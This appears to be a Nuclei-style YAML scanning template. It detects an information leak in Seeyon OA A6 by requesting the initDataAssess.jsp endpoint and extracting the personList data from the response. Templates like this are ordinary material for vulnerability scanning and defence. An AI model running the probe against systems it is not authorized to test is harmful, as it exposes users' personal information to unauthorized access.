http:
    - extractors:
        - group: 1
          part: body
          regex:
            - personList\[0\]=(.*?);
          type: regex
      method: GET
      path:
        - '{{BaseURL}}/yyoa/assess/js/initDataAssess.jsp'
id: seeyon-oa-a6-init-data-assess-infoleak
info:
    author: pphua
    description: 致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露
    name: seeyon-oa-a6-init-data-assess-infoleak
    severity: medium
    tags:
        - infoleak
        - seeyon
